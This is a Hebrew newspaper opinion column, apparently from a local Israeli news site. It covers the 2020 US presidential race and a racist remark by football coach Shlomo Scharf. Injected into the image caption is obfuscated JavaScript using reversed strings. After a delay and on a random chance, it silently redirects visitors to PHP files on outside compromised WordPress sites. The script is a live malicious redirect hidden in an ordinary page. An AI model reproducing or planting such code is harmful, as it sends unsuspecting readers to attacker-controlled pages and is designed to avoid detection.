fbpx
[shortcode-weather-atlas city_selector=1178232 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

הקרב על אמריקה

במסע הבחירות האמריקאי אני כל הזמן עוקב אחרי הסטנד-אפ של שני גיבורי הקרב, ולפעמים אני נזכר בקרב בין מוחמד עלי לג'ו פורמן, קרב צמוד שנמשך יותר מדי סיבובים
הבחירות בארצות הברית | איור: shutterstock
הבחירות בארצות הברית | איור: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

הבחירות בארצות הברית

לא יודע, בזמן שאני כותב עכשיו, מי ינצח בבחירות בארצות הברית. האמת שאין לי עמדה בנושא. זו בעיה של אמריקה ולא שלי. פה יש לי מספיק צרות עם הממשלה הלא מושלת הזאת ועם האמת שמאחורי אמירתו של הסוחר דני אלחרר שהממשלה הזאת ספק אם יודעת לנהל קיוסק. אבל אני עף על זה שבאמריקה הקרב הוא בין שני בחורים זקנים, האחד 74 והשני 78, שהולכים חזק על כל הקופה.

היה זה שמעון פרס, עליו השלום, שאמר שאם היה יושב בבית עם סוניה במקום להיות נשיא היה מת כמה שנים קודם. בתור קשיש צעיר (אני בן 68) אני מעריץ את הטמפרמנט של טראמפ וביידן, שחורשים את אמריקה ונלחמים ראש בראש על הבכורה לנצח ולהנהיג.

ביידן גילה אחריות בקורונה לעומת טראמפ, וגם מינה לו סגנית צעירה למקרה שיתחיל לדבר קצת שטויות. אתם הרי יודעים שבגיל 80, בן אדם יכול להיות חד כתער או חלוד עד אימה. ואם הכשל הבריאותי יבוא, יש מאחורי ביידן אישה צעירה שמחממת מנועים.

במסע הבחירות האמריקאי אני כל הזמן עוקב אחרי הסטנד-אפ של שני גיבורי הקרב, ולפעמים אני נזכר בקרב בין מוחמד עלי לג'ו פורמן, קרב צמוד שנמשך יותר מדי סיבובים. כאז כן עכשיו, טראמפ רוקד וזורק נאצות ונראה כמו חיקוי שלו ב"ארץ נהדרת", ואילו ביידן מדבר בפאתוס מוגזם שמראה שלמד משהו מהבוס שלו ברק אובמה.

הלילה או מחר בבוקר אשב מול הטלוויזיה ואצפה בסיומת של הקרב על אמריקה, בתקווה שלא תהיה הארכה אלא הכרעה, כי אני, כאמור, בגילי עייף מדי בשעות הללו ורוצה לישון בזמן שהשוורים הקשישים נלחמים ביניהם. גוד בלאס אמריקה.

השפיץ של שלמה

חיים ומוות בקצה הלשון, אומר הפתגם הצועני העתיק, והנה שלוימה שרף, דמות מפתח בכדורגל הישראלי, שייזכר תמיד כמי ששם את מכבי חיפה על המפה הלאומית עם שתי אליפויות מדהימות, ובכן שלמה שרף, בשיא חוצפתו, שלח שחקן מפנמה בחזרה לארצו לאכול בננות, משל היה קוף שירד מהעצים, ועוד המשיך לגלגל בלשונו ואמר שלא התכוון לשום דבר גזעני. הוא פשוט ידע שפנמה יצואנית בננות וזה בכלל כמו לומר לשחקן ישראלי שיילך לאכול חומוס.

שלמה שרף חושב שאפשר לעבוד עלינו. טעית, נכשלת, קבל צינון ושב קצת בבית, אולי תעשה הסבה מקצועית ותרוץ לראשות מפלגת העבודה, אבל בינתיים שחרר קצת, הרי אתה קצת גזען ויצא לך הגן הגזעני שלך החוצה, וזו לא הפעם הראשונה.

שרף היה ידוע כמאמן מקלל, האוטוריטה שלו הייתה בעזרת קללות. עוד אפשר להבין לקרוא לשחקן בן-טיבוגה או אפס מאופס, זה חלק מהווי המגרשים, אבל שרף זרק גם בוץ גזעני ופעם אמר בשידור חי על שחקן שחור שצריך לשלוח אותו בכלוב חזרה לאפריקה.

מאיפה בא לשרף הגן הגזעני, אינני יודע, אבל זה עצוב מאוד שמאמן נבחרת, דמות ייצוגית, שידע לעבוד עם שחקנים מכל המגזרים וגם טיפח בקבוצות הנוער שלו שחקנים שצבע עורם אינו כשלו, מהיכן בא לו השפל התרבותי הזה? יפה יעשה האם יתנצל בפומבי ויאמר שטעה והוא הולך לטיפול נגד דעות גזעניות. שנאמר: מודה ועוזב ינוחם.

אהבתם את הטור של צ'רקס? טורים נוספים כאן

בקרו אותנו גם בפייסבוק: הד הקריות

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות